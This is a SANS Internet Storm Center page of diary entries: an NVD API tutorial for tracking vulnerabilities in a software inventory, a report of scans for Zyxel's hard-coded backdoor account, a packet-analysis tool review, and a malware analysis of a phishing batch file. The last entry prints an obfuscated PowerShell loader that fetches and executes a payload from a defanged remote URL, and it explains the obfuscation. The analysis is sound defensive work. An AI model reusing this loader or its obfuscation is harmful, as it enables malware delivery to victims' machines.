SANS Internet Storm Center - Cooperative Cyber Security Monitor
January 7, 2021

Using the NIST Database and API to Keep Up with Vulnerabilities and Patches (Part 1 of 3), (Thu, Jan 7th)

It's been a while since NIST changed the API for their NVD (National Vulnerability Database), so I (finally) got around to writing some code against that API.  This API gives your code a way to query CVEs (Common Vulnerabilities and Exposures) against a broad range of products, or against specific products.  What this immediately brought to mind was the line I always ask my clients to put in someone's job description: "monitor vendor announcements and industry news for vulnerabilities in the products in use by the organization".  This can be a tough row to hoe, especially if we're not talking about Microsoft / Cisco / Oracle and the other "enterprise flagship" products that might immediately come to mind - if you monitor the CVE list you'll see dozens or hundreds of CVEs scroll by in a day.  Subscribing to all the vendor security newsgroups and feeds can also quickly turn into a full-time proposition.  I think using the NIST API can be a viable alternative to just plain "keeping up".  CVEs often run a few days behind vendor announcements and patches, but on the other hand the CVE database is a one-stop shop - (theoretically) everything is posted there.

In most cases I'd expect a hybrid approach - monitor industry news and vendor sources for your "big gun" applications, and then query this database for everything (to catch smaller apps and anything missed on your list of major apps).

First of all, in this API products are indexed by "CPE" (Common Platform Enumeration), a structured naming convention.  Let's see how this works - first, let's query the CPE database to get the NVD representation of the products that you have in your organization.  You can do this iteratively.

For instance, to get PeopleSoft versions, start by querying Oracle products:

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:*:oracle

Then narrow it down with the info you find in that search to get PeopleSoft.  

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:*:oracle:peoplesoft_enterprise

As you can see, you can narrow this down further by version:

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:a:oracle:peoplesoft_enterprise:8.22.14

.. however you might also want to leave that a bit open - you don't want to be in the position where your Operations team has updated the application but maybe didn't tell the security team or the security developer team (that'd be you).
(Or the dev-sec-dev-devops or whatever we're calling that these days :-))
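These iterative narrowing queries are easy to script. Below is a minimal Python sketch of assembling the query URLs; the endpoint and the cpeMatchString parameter are exactly the ones shown in the examples above, while the helper function itself is just an illustration:

```python
from urllib.parse import quote

# CPE search endpoint used in the examples above
CPE_API = "https://services.nvd.nist.gov/rest/json/cpes/1.0"

def cpe_match_url(part="*", vendor="*", product=None, version=None):
    """Build a cpeMatchString query URL, narrowing only as far as the
    fields supplied - vendor first, then product, then version."""
    fields = ["cpe:2.3", part, vendor]
    if product:
        fields.append(product)
        if version:
            fields.append(version)
    match = ":".join(fields)
    # ':' and '*' are part of the CPE syntax, so leave them unescaped
    return f"{CPE_API}?cpeMatchString={quote(match, safe=':*')}"
```

Feeding the result to Invoke-WebRequest (or your HTTP client of choice) then returns the matching CPE names.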

Repeat this process for everything in your organization's flock of applications and Operating Systems.  As with all things of this type, of course test with one or three applications/CPEs, then grow your list over time.  You can use our previous diary on collecting hardware and software inventories (CIS Critical Controls 1 and 2) - code for these is here:
https://github.com/robvandenbrink/Critical-Controls/tree/master/CC01
https://github.com/robvandenbrink/Critical-Controls/tree/master/CC02

Full docs for the CPE API are here:
https://csrc.nist.gov/publications/detail/nistir/7696/final
https://csrc.nist.gov/CSRC/media/Projects/National-Vulnerability-Database/documents/web%20service%20documentation/Automation%20Support%20for%20CPE%20Retrieval.pdf

So how do we translate from a "real" inventory as reported by Windows WMI or PowerShell into what the CPE API expects?  The short answer is "the hard way" - we hit each application, one by one, and do an "it looks sorta like this" query.  The NVD gives us a handy page for this - for a manual job like this I find the website quicker than the API.
First, navigate to https://nvd.nist.gov/products/cpe/search/

Then, put in your application name, vendor name, or any substring of those.

For instance, putting in "AutoCAD" gives you 4 pages of various versions and application "bolt-ons" (or "toolsets" in AutoCAD-speak).  It's interesting that the versioning convention is not standard, even within this single first product example.
Some versions are named "autocad:2010", and some are named "autodesk:autocad_architecture_2009".
What you'll also find in this exploration is that "AutoCAD version 2020" is actually version "24.0" as reported by the Windows interfaces - some of this oddness creeps into the CPE database as well.

Looking at a few apps that are more commonly used, let's look at the Adobe and FoxIT PDF readers.

To get all current-ish versions of FoxIT Reader, we'll look for 10.0 and 10.0.1.  These boil down to:

cpe:2.3:a:foxitsoftware:foxit_reader:10.*

This query gives us a short list:

cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0:*:*:*:*:*:*:*
cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0.35798:*:*:*:*:*:*:*
cpe:2.3:a:foxitsoftware:foxit_reader:10.0.1.35811:*:*:*:*:*:*:*


For our final list, we'll modify that last one to catch future sub-versions of 10.0.1, as:

cpe:2.3:a:foxitsoftware:foxit_reader:10.0.1.*
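Once you have candidate CPE names back, this wildcard selection can also be approximated locally - a small Python sketch using fnmatch against the FoxIT list above (the helper is illustrative; the API does its own matching server-side):

```python
from fnmatch import fnmatch

# The three FoxIT Reader CPEs returned by the 10.* query above
FOXIT_CPES = [
    "cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0:*:*:*:*:*:*:*",
    "cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0.35798:*:*:*:*:*:*:*",
    "cpe:2.3:a:foxitsoftware:foxit_reader:10.0.1.35811:*:*:*:*:*:*:*",
]

def matching_cpes(cpes, pattern):
    """Filter CPE names with shell-style wildcard semantics, roughly
    mirroring what the cpeMatchString examples do server-side."""
    return [c for c in cpes if fnmatch(c, pattern)]
```

This is handy for sanity-checking which of your collected CPEs a given pattern would actually catch before you commit it to your query list.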

Looking for Adobe Reader DC version 19 and 20, we end up with:

cpe:2.3:a:adobe:acrobat_reader_dc:19.*
cpe:2.3:a:adobe:acrobat_reader_dc:20.*

This all looks straightforward, except that when you look at a few versions of 20, it looks like:

cpe:2.3:a:adobe:acrobat_reader_dc:20.009.20074:*:*:*:continuous:*:*:*
cpe:2.3:a:adobe:acrobat_reader_dc:20.001.30002:*:*:*:classic:*:*:*


So you'd think a properly formed query for version 20/classic would look like:
cpe:2.3:a:adobe:acrobat_reader_dc:20.*.*:*:*:*:classic:*:*:* - but no, that doesn't work

So you see, there's a bit of back-and-forth for each one - for each of my clients I tend to set an afternoon aside to turn their software inventory into a "CPE / CVE friendly" inventory.
You can speed this process up by downloading the entire CPE dictionary and grep-ing through it for what you need: https://nvd.nist.gov/products/cpe
Just using grep, you can likely relate your software inventory back to the CPE dictionary much more easily - for instance:

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i office
    <title xml:lang="en-US">Avery Wizard For Microsoft Office Word 2003 2.1</title>
    <title xml:lang="en-US">Microsoft BackOffice</title>
    <title xml:lang="en-US">Microsoft BackOffice 4.0</title>
    <title xml:lang="en-US">Microsoft BackOffice 4.5</title>
    <title xml:lang="en-US">Microsoft backoffice_resource_kit</title>
    <title xml:lang="en-US">Microsoft backoffice_resource_kit 2.0</title>
    <title xml:lang="en-US">Microsoft Office Excel 2002 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2003 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2007 Service Pack 2</title>
    <title xml:lang="en-US">Microsoft Office Excel 2007 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x86 (32-bit)</title>
    <title xml:lang="en-US">Microsoft Internet Explorer 5 (Office 2000)</title>
    <title xml:lang="en-US">Microsoft Internet Explorer 5.01 (Office 2000 SR-1)</title>
    <title xml:lang="en-US">Microsoft Office</title>
    <title xml:lang="en-US">Microsoft Office 3.0</title>
    <title xml:lang="en-US">Microsoft Office 4.0</title>
    <title xml:lang="en-US">Microsoft Office 4.3</title>
    <title xml:lang="en-US">Microsoft Office 95</title>
    <title xml:lang="en-US">Microsoft Office 97</title>
    < ... more older versions .. >
    <title xml:lang="en-US">Microsoft Office 2013</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT</title>
    <title xml:lang="en-US">Microsoft Office 2013 Click-to-Run (C2R)</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT Edition</title>
    <title xml:lang="en-US">Microsoft Office 2013 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 x86 (32-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 SP1</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 on X86</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT SP1</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 RT Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 for MacOS</title>
    <title xml:lang="en-US">Microsoft Office 2016 Click-to-Run (C2R)</title>
    <title xml:lang="en-US">Microsoft Office 2016 Click-to-Run (C2R) x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2016 MacOS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 Mac OS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2019</title>
    <title xml:lang="en-US">Microsoft Office 2019 on x64</title>
    <title xml:lang="en-US">Microsoft Office 2019 on x86</title>
    <title xml:lang="en-US">Microsoft Office 2019 for Mac OS</title>
    <title xml:lang="en-US">Microsoft Office 2019 for Mac OS X</title>
    <title xml:lang="en-US">Microsoft Office 2019 for macOS</title>
    <title xml:lang="en-US">Microsoft Office 2019 Mac OS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT</title>
    < and so on ... >

You can see this list relates much better to your "actual" inventory as reported by more "traditional" means (WMI / PowerShell).
Now refine this list, relating the results back to your real inventory.  Since the "match" on the title isn't always exact, this again usually involves some manual work.  Even mainstream products don't always have a match.
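Some of that manual matching can be pre-screened with a fuzzy comparison between your inventory names and the dictionary titles. A minimal sketch using Python's difflib - the helper name and the 0.5 cutoff are my own choices here, not part of any NVD tooling, and a human still makes the final pick:

```python
from difflib import get_close_matches

def closest_cpe_titles(inventory_name, cpe_titles, n=3, cutoff=0.5):
    """Suggest the n closest CPE dictionary titles for one inventory
    entry, best match first; tune cutoff to taste."""
    return get_close_matches(inventory_name, cpe_titles, n=n, cutoff=cutoff)
```

Run each name from your WMI / PowerShell inventory through this against the grep-ed title list, and you get a short list of candidates per application instead of eyeballing the whole dictionary.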

For instance, looking for MS Project 2013:
From our cross-domain software inventory (in PowerShell) we have:

> $domainapps.name | grep "Project"
Microsoft Project MUI (English) 2013
Microsoft Project Professional 2013

And from the CPE Dictionary:

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i project | grep 2013
    <title xml:lang="en-US">Microsoft Project 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Project Server 2013</title>
    <title xml:lang="en-US">Microsoft Project Server 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Project Server 2013 Service Pack 1 (x64) 64-bit</title>

So a match, but not exact.

Another illustration - even for MS Word there isn't an exact match; in almost every case we're either picking a few CPEs or guesstimating the closest one:

> $domainapps.name | grep "Word"
Microsoft Word MUI (English) 2013

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i word | grep 2013
    <title xml:lang="en-US">Microsoft Word 16.0.11425.20132 for Android</title>
    <title xml:lang="en-US">Microsoft Word 2013</title>
    <title xml:lang="en-US">Microsoft Word 2013 RT Edition</title>
    <title xml:lang="en-US">Microsoft Word 2013 for Microsoft Windows RT</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1 on x86</title>
    <title xml:lang="en-US">Microsoft Word 2013 SP1 RT</title>
    <title xml:lang="en-US">Microsoft Word RT 2013 Service Pack 1</title>

 

Where this plays well for me is if I exclude Windows and Office - for those, just using Windows Update (or your WSUS, SCCM or whatever patch manager you use) and auditing the "last updated" date for Windows tends to catch things really well.  It's the MS server apps - Exchange, SQL and so on - and everything that isn't Microsoft where this method really helps turn the flood of CVE information into a once-a-week summary that you can use.

 

As you'd expect, if you are in a niche industry, you may not find all of your applications - for instance ICS clients and Banking clients may not find their user-facing main business applications in the CPE list, and sadly will never see CVEs to keep their vendors honest.

In a welcome recent development, as I was writing this article I noticed that if your application has a listening port, nmap will make a reasonably good estimate of what that application is with the "-sV" option (probe open ports to determine service/version info).  In the example below nmap very nicely inventories my ESXi 7.0 server, and gives me the exact CPE for it:

C:\>nmap -sV -p 443 --open 192.168.122.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-06 18:45 Eastern Standard Time
Nmap scan report for 192.168.122.51
Host is up (0.0011s latency).

PORT    STATE SERVICE   VERSION
443/tcp open  ssl/https VMware ESXi SOAP API 7.0.0
MAC Address: 00:25:90:CB:00:18 (Super Micro Computer)
Service Info: CPE: cpe:/o:vmware:ESXi:7.0.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.70 seconds
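Those nmap-reported CPEs are easy to harvest at scale. A small Python sketch (the helper names are hypothetical) that pulls the identifiers out of -sV text output; note that nmap prints the older cpe:/ URI form, while the NVD queries in this article use the cpe:2.3: formatted-string form, so a naive prefix conversion is included:

```python
import re

# nmap -sV reports CPEs in the CPE 2.2 URI form, e.g. cpe:/o:vmware:ESXi:7.0.0
CPE_RE = re.compile(r"cpe:/[aho]:[^\s,]+")

def cpes_from_nmap(output):
    """Collect all cpe:/... identifiers from nmap -sV text output."""
    return CPE_RE.findall(output)

def to_cpe23(cpe_uri):
    """Naive CPE 2.2 URI -> 2.3 formatted-string prefix swap; good
    enough for simple vendor:product:version identifiers like the one
    above, not a full spec-compliant conversion."""
    return cpe_uri.replace("cpe:/", "cpe:2.3:", 1)
```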


Now, with your software inventory complete and your CPE strings in hand, you can start querying for CVEs!

Sticking with our Acrobat and FoxIT examples, we can search for all CVEs - to do this we'll change the API URI slightly; all the URI conventions stay consistent:

https://services.nvd.nist.gov/rest/json/cves/1.0?cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*

Now things start to look interesting! Of course, given our search this gets us a boatload of CVEs.  Let's look at just the last 60-ish days - we'll query for "modified since Nov 1, 2020":

https://services.nvd.nist.gov/rest/json/cves/1.0?modStartDate=2020-11-01T00:00:00:000%20UTC-05:00&cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*

Keep in mind too that there are a few dates involved - the publishedDate and lastModifiedDate.  While the NVD examples typically go after "last modified", I've seen CVEs from the mid-2000s with a "last modified" date in 2019 - so be careful.  Normally I query using "publishedDate".

Again, rinse and repeat for all of the CPEs you've collected.  We're still playing in the browser, but you can see it's a simple query, and the return values are in JSON, so things look simple.  Except that as things nest and nest, what looks simple on the screen isn't necessarily simple in code.  For instance, to get the CVE numbers for the Acrobat Reader DC 20 query above, the PowerShell code looks like:

$request = "https://services.nvd.nist.gov/rest/json/cves/1.0?modStartDate=2020-11-01T00:00:00:000%20UTC-05:00&cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*"
$CVES = (Invoke-WebRequest $request | ConvertFrom-Json).result.CVE_Items.cve.CVE_data_meta.id
$CVES

CVE-2020-24439
CVE-2020-24438
CVE-2020-24436
CVE-2020-24434
CVE-2020-24426
CVE-2020-24437
CVE-2020-24435
CVE-2020-24433
CVE-2020-24432
CVE-2020-24431
CVE-2020-24430
CVE-2020-24429
CVE-2020-24428
CVE-2020-24427
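For comparison, here is the same nested walk in Python, run against a small stub shaped like the fields used above (result.CVE_Items[].cve.CVE_data_meta.ID plus publishedDate). The IDs are taken from the list above but the dates in the stub are illustrative only; a real run would fetch this JSON from the cves/1.0 endpoint instead:

```python
import json

# Stub response for illustration; in real use this JSON comes from
# the cves/1.0 endpoint and the dates come from the NVD, not from me.
STUB = json.loads("""
{"result": {"CVE_Items": [
  {"cve": {"CVE_data_meta": {"ID": "CVE-2020-24439"}},
   "publishedDate": "2020-11-05T15:15Z"},
  {"cve": {"CVE_data_meta": {"ID": "CVE-2020-24427"}},
   "publishedDate": "2020-10-15T12:00Z"}
]}}
""")

def cve_ids(response, published_since=""):
    """Walk result.CVE_Items[].cve.CVE_data_meta.ID, optionally keeping
    only entries published on or after a given date (ISO date strings
    compare correctly as plain strings)."""
    return [item["cve"]["CVE_data_meta"]["ID"]
            for item in response["result"]["CVE_Items"]
            if item["publishedDate"] >= published_since]
```

This also makes the publishedDate vs lastModifiedDate distinction easy to handle client-side, whichever field you end up trusting.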

While this is starting to get useful, keep in mind that it's only as good as the database.  For instance, look at any particular product: writing it will have involved a language, likely some libraries, maybe a framework and some other components.  There isn't a team of elves drawing up that hierarchy for public consumption anywhere.  We can only hope that the dev team who wrote the thing is keeping that list for their own use! (Hint: lots of them are not.)

You can deconstruct any particular application to some degree ( https://isc.sans.edu/forums/diary/Libraries+and+Dependencies+It+Really+is+Turtles+All+The+Way+Down/20533/ ), but if you go that deep, you'll find that your list will likely see components get added or removed from version to version - it'll turn into a whack-a-mole-science-project in no time!
For a point-in-time application pentest this can be useful, but to just keep tabs on how your security posture is from week to week, you'll likely find yourself spending more time on application archeology than it's worth.

All is not lost though - as we've seen above, we can get useful information just at the application level.  And keep in mind the CVE list is what your scanner uses as its primary source - as do your red team, your malware, and any "hands on keyboard" attackers that your malware escorts onto your network.  So while the CVE list will never be complete, it's the data all of your malicious actors go to first.


Let's dig deeper into this - with our inventory of CPEs now solid, tomorrow we'll play more with the API details at the CVE level, and on Monday there'll be a full working app (I promise!) that you can use in your organization.

==== of note ====

In the course of playing with this API, I ended up opening a case with the folks at NIST; the turnaround from initial question to final answer was two days, which for me is very responsive - especially for a free product!

===============
References:

Full docs for CVE API are here:
https://csrc.nist.gov/publications/detail/nistir/7696/final
https://csrc.nist.gov/CSRC/media/Projects/National-Vulnerability-Database/documents/web%20service%20documentation/Automation%20Support%20for%20CPE%20Retrieval.pdf

===============
Rob VandenBrink
rob@coherentsecurity.com

 

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 7, 2021

ISC Stormcast For Thursday, January 7th, 2021 https://isc.sans.edu/podcastdetail.html?id=7318, (Thu, Jan 7th)

January 6, 2021

Scans for Zyxel Backdoors are Commencing., (Wed, Jan 6th)

It was the day (or two days actually) before Christmas when Niels Teusing published a blog post about a back door in various Zyxel products [1]. Niels originally found the vulnerability in Zyxel's USG40 security gateway, but it of course affects all Zyxel devices using the same firmware. According to Zyxel, the password was used "to deliver automatic firmware updates to connected access points through FTP" [2]. So in addition to using a fixed password, it appears the password was also sent in the clear over FTP.

Zyxel products are typically used by small businesses as firewalls and VPN gateways ("Unified Security Gateway").  There is little in terms of defense in depth that can be applied to protect the device, and ssh and the VPN endpoint via HTTPS are often exposed.  The default credentials found by Niels are not just limited to FTP: they can be used to access the device as an administrator via ssh.

So yet again, we do have a severe "stupid" vulnerability in a device that is supposed to secure what is left of our perimeter.

Likely due to the holidays, and maybe because Niels did not initially publish the actual password, widespread exploitation via ssh had not started until now.  But we are now seeing attempts to access our ssh honeypots via these default credentials.

The scans started on Monday afternoon (I guess they first had to adapt their scripts in the morning), initially mostly from 185.153.196.230.  On Tuesday, 5.8.16.167 joined in on the fun, and finally today we have 45.155.205.86.  The last IP has been involved in scanning before.

What can/should you do?

  • If you are using affected devices: UPDATE NOW. See Zyxel's advisory [2]. Please call Zyxel support if you have questions.
  • If you are using any kind of firewall/gateway/router, no matter the vendor, limit its admin interface exposure to the minimum necessary. Avoid exposing web-based admin interfaces. Secure ssh access as best you can (public keys...). In the case of a hidden admin account, these measures will likely not help, but see if you can disable password authentication. Of course, sometimes vendors choose to hide ssh keys instead of passwords.
  • Figure out a way to automatically get alerts if a device is running out of date firmware. Daily vulnerability scans may help. Automatic firmware updates, if they are even an option, are often considered too risky for a perimeter device.
  • If you are a vendor creating these devices: get your act together. It is ridiculous how many "static keys", "support passwords" and simple web application vulnerabilities are found in your "security" devices. Look over the legacy code and do not rely on independent researchers to do your security testing.

And as a side note for Fortinet users: see what the new year just got you:

https://www.fortiguard.com/psirt?date=01-2021 . 

 

[1] https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html

[2] https://www.zyxel.com/support/CVE-2020-29583.shtml

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

January 6, 2021

ISC Stormcast For Wednesday, January 6th, 2021 https://isc.sans.edu/podcastdetail.html?id=7316, (Wed, Jan 6th)

January 5, 2021

Netfox Detective: An Alternative Open-Source Packet Analysis Tool , (Tue, Jan 5th)

[This is a guest diary by Yee Ching Tok (personal website here (https://poppopretn.com)). Feedback welcome either via comments or our contact page (https://isc.sans.edu/contact.html)]

Various digital forensic artifacts are generated during intrusions and malware infections. Other than analyzing endpoint logs, memory and suspicious binaries, network packet captures offer a trove of information to incident handlers that could help them triage incidents quickly (such as determining if sensitive data had been exfiltrated). Popular tools such as WireShark, Ettercap, NetworkMiner or tcpdump are often used by incident handlers to analyze packet captures. However, there could be situations where a tool is unable to open up packet captures due to its size or being deliberately tampered (perhaps in Capture-the-Flag (CTF) challenges to increase difficulty and complexity). As such, being proficient in multiple alternative tools for packet analysis could come in handy, be it for handling incidents or for CTF challenges.

I recently came across an open-source tool for packet analysis named Netfox Detective [1], developed by the Networked and Embedded Systems Research Group at Brno University of Technology [2]. To showcase some of its features, I mainly used the packet capture created in my previous diary [3]. Firstly, with reference to Figure 1, a workspace needs to be created. As the name implies, the created workspace will contain artifacts such as packet captures or logs that would be analyzed (in this example, I only used network packet captures and did not import any logs).

Figure 1: Creation of Workspace for Analysis

Following that, I imported the network packet capture created in my previous diary [3] and Figure 2 shows an overview of the statistics of the packet capture. An interesting observation was that I did not know some packet loss occurred during the capture I made previously. It was also interesting to note that Netfox Detective utilized TCP heuristics that the creators have developed previously and improved on to mitigate corrupted or missing packets so as to collate as many network conversations as possible [4].

Figure 2: Overview of NAT Slipstreaming Packet Capture

As compared to WireShark where packets are displayed linearly, Netfox Detective has a tabbed view and displays the packets at Layer 3, Layer 4 and Layer 7 (linear option also available by selecting the “Frames” tab). Figure 3 shows the Layer 4 tab being selected and corresponding results being displayed.

Figure 3: Netfox Detective displaying Layer 4 Network Traffic

Selecting a conversation (highlighted in Figure 3) will add the selection in the “Conversation explorer” pane (highlighted by the red box in Figure 4). Double clicking the entry in “Conversation explorer” will create a new tab “Conversation detail” where a summary of the interaction is displayed (as shown in Figure 4). I found the Packet Sequence Chart to be very useful as it visualized when the various packets were transmitted with respect to their frame size.

Figure 4: Conversation detail view of 192.168.211.132 and 192.168.2.1

Following that, with reference to Figure 5, I selected frame number 336 for an in-depth look, and we can see the ACK and RST flags reflected in this packet (an expected finding, as per the observations of the NAT Slipstreaming experiment I did previously).

Figure 5: Frame content view of Frame Number 336

There could be instances where analysis of multiple related network packet captures is needed in an incident. Netfox Detective allows multiple packet capture files to be imported into the same workspace (as shown in Figure 6). Over here, I used another packet capture created by Brad Duncan [5] to demonstrate the feature. 

Figure 6: Importing Multiple Packet Capture Files into the Same Workspace

As always, there are strengths and weaknesses in the various tools we use for packet analysis. Netfox Detective can only be installed on Microsoft Windows (Windows Vista SP2 or newer), and supports a smaller subset of protocols as compared to other tools such as WireShark [1]. However, the various tabbed views at Layer 3, 4 and 7, packet visualizations and ability to group related packet captures in a same workspace offers a refreshing perspective for incident handlers to perform their analysis/triage on network packet captures. Moreover, the open-source nature of Netfox Detective allows further enhancements to the tool itself.

For a complete read about Netfox Detective’s design decisions and technical implementations, their published paper is available here [4]. To download Netfox Detective, the information can be found on their GitHub page [1].

[1] https://github.com/nesfit/NetfoxDetective/
[2] https://nesfit.github.io/
[3] https://github.com/poppopretn/ISC-diaries-pcaps/blob/main/2020-11-NAT-Slipstream.zip
[4] https://doi.org/10.1016/j.fsidi.2020.301019
[5] https://www.malware-traffic-analysis.net/2020/11/10/index.html 
 

January 5, 2021

ISC Stormcast For Tuesday, January 5th, 2021 https://isc.sans.edu/podcastdetail.html?id=7314, (Tue, Jan 5th)

January 4, 2021

From a small BAT file to Mass Logger infostealer, (Mon, Jan 4th)

Since another year went by, I’ve decided to once again check all of the malicious files which were caught in my e-mail quarantine during its course. Last year, when I went through the batch of files from 2019, I found a couple of very large samples[1] and I wanted to see whether I’d find something similar in the 2020 batch.

I started with just over 900 files of many different types, and although I did notice a couple of unusually large files when one took their extensions into consideration (e.g. a JS file with a size exceeding 1 MB, which turned out to be a sample of WSH RAT[2]), the largest sample in the batch overall was an EXE with a size of 17 MB. It was not small by any means, but its size was not too unusual either - it was definitely not in the same weight class as the 130 MB executable sent to us by one of our readers back in August[3].

On the other side of the size spectrum, the situation was pretty much the same – there weren't any files which would be interesting because of their exceptional size (or lack thereof) either. While quickly going over the small files, however, one of them did catch my eye. Among the smallest executable scripts was a 1.68 kB BAT file from September 2020 with the name of “A megállapodás feltételei_doc04361120200812113759-ACF.28668_DPJ2020012681851.PDF.bat” (the first part roughly translates from Hungarian as “Terms of agreement”), which contained the following slightly obfuscated PowerShell script that turned out to be quite interesting.

@echo off
Start /MIN Powershell -WindowStyle Hidden -command "$Dxjyp='D4@C7@72@72... ... ...F6@26@45@42'; $text =$Dxjyp.ToCharArray(); [Array]::Reverse($text); $tu=-join $text; $jm=$tu.Split('@') | forEach {[char]([convert]::toint16($_,16))}; $jm -join ''|I`E`X"

After reversing and decoding the contents of the $Dxjyp variable, the main body of the script became readable. The script was supposed to download and execute contents of the file A12.jpg downloaded from http[:]//topometria[.]com[.]cy.

$Tbone='*EX'.replace('*','I'); sal M $Tbone; do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping); $p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072); [System.Net.ServicePointManager]::SecurityProtocol = $p22; $mv='(N'+'ew'+'-O'+'b'+'je'+'c'+'t '+ 'Ne'+'t.'+'W'+'eb'+'C'+'li'+'ent)'+'.D'+'ow'+'nl'+'oa'+'d'+'S'+'tr'+'ing(''http[:]//topometria[.]com[.]cy/A12.jpg'')'|I`E`X; $asciiChars= $mv -split '-' |ForEach-Object {[char][byte]"0x$_"}; $asciiString= $asciiChars -join ''|M
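The deobfuscation steps are simple to reproduce. Here is a Python sketch of the same transform the batch file applies (reverse the whole string, split on '@', hex-decode each token), demonstrated on a toy payload rather than the real $Dxjyp contents:

```python
def encode_reversed_hex(text):
    """Obfuscate the way the BAT file does: hex-encode each character,
    join the pairs with '@', then reverse the whole string."""
    return "@".join(f"{ord(c):02X}" for c in text)[::-1]

def decode_reversed_hex(blob):
    """Undo it: reverse the string, split on '@', and turn each hex
    pair back into a character."""
    return "".join(chr(int(pair, 16)) for pair in blob[::-1].split("@"))
```

Round-tripping any ASCII string through these two functions returns the original, which is a quick way to sanity-check the decoder before pointing it at real samples.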

The URL contained within the script is no longer active, but I managed to find a copy of the A12.jpg file in an Any.Run task from September, in which someone analyzed a differently named (but functionally identical) version of the batch script[4].

The JPG file (that was of course not JPG at all) was 3.25 MB in size. This turned out not to be too much when one considers that it contained the main malicious payload in the form of one EXE and one DLL, but before we get to these files, let’s quickly take a look at A12.jpg.

Its contents looked exactly as one would expect given the last two lines of the PowerShell code we’ve seen above (i.e. hex-encoded ASCII characters separated by hyphens).

24-74-30-3D-2D-4A-6F-69-6E-20-28-28-31-31-... ... ... 0D-0A-20-20-0D-0A-0D-0A-0D-0A-20-20

At this point it is good to mention that for the purposes of analyzing any potentially malicious code, it can be invaluable to remember the hex values of a few common ASCII characters. Besides the usual “M” (0x4D) and “Z” (0x5A), which form the header of Windows PE executables, and a couple of others, it may be a good idea to also remember that “$” has the hex value 0x24. In this way, even if we got our hands on the A12.jpg file without any other context, we might deduce that it could contain code in one of the languages in which the dollar sign is used to denote variables.
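That triage trick is easy to sketch in a few lines of Python (the helper names are hypothetical): decode the hyphen-separated dump and look at the leading bytes - 0x4D 0x5A ("MZ") suggests a PE, 0x24 ("$") suggests script code with variables. The first four bytes of the dump above decode to "$t0=":

```python
def decode_hyphen_hex(dump):
    """Turn a '24-74-30-...' style dump back into raw bytes."""
    return bytes(int(pair, 16) for pair in dump.split("-"))

def sniff(first_bytes):
    """Very rough content guess from the leading bytes."""
    if first_bytes.startswith(b"MZ"):
        return "PE executable"
    if first_bytes.startswith(b"$"):
        return "script with $-variables (PowerShell, PHP, ...)"
    return "unknown"
```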

After decoding the downloaded file, it became obvious that it did indeed contain a part of a PowerShell script. What was especially interesting about it were two variables which seemed to each contain a PE structure.

